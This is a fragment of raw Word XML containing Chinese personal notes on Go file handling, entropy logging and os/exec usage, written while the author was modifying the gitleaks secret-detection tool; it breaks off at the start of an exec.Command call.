        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        fmt.Printf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件打开失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=%v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555EE41D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3462016E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDDAB15" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F92178" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5885AE17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ioutil.ReadDir:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取某目录下的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B749CB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63AD1C0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if os.IsNotExist(err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031A1D6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接目录中没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录，进行二层处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE7BE5C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>files, _ := ioutil.ReadDir(ZipDestFileDir)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E8826" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if len(files) == 1 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2539D12E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>_, err := os.Stat(filepath.Join(ZipDestFileDir, files[0].Name(), ".git"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361A8E1B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CA64B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if os.IsNotExist(err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686C88C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">GitPath = </w:t>
      </w:r>
      <w:r>
        <w:t>“”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC89DAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5577DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE47C2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>GitPath = filepath.Join(ZipDestFileDir, files[0].Name())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177CC635" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC9C66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C98B0EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C82C99" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52639B69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实操案例：记录熵值计算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524DDCF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1022D70F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>item := fmt.Sprintf("%s\t%d\t%d\t%f\n", data, len(data), len(charCounts), entropy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A1206F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>filePath := "C:/Users/ranja/Videos/entrophy.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77660ED3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>file, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE, 0666)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21539FF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C0B51" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>打开文件失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BAD454" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E70734F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>defer file.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B045A8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>write := bufio.NewWriter(file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51124CDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>write.WriteString(item)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B368A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>write.Flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0822D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C2CD88F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实例：将大文本内容读成为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7CD2F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某个包中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B658F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>var wordListText string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187F287D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6140FE74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156E8714" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>var wordFilePath = "E:/BiLing/20220905-gitleaks-Docker/SecretDetection/bindata/american-english"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C40C310" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">wordListTextBytes, err := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>ioutil.ReadFile(wordFilePath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B880A83" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D082B4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:t>单词本文件读取失败</w:t>
      </w:r>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D719EB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE26404" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>wordListText = string(wordListTextBytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A23B443" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C73AC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34265588" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DAC2490" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10038035" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os.exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：执行系统命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A2733" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd.Run()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd.Start()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，都可以，通常在运行之前把标准输出、错位等指针指定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9EC757" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2852192B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>注意，这里传入长字符串的话，无法正常运行命令，命令很有可能会被改变，并在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>cmd.Run()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>返回的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>中看到命令内容被改变。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709C41D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3595B56F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我改的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容，运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5E3A51" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F00AD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cmd := exec.Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDCDD02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
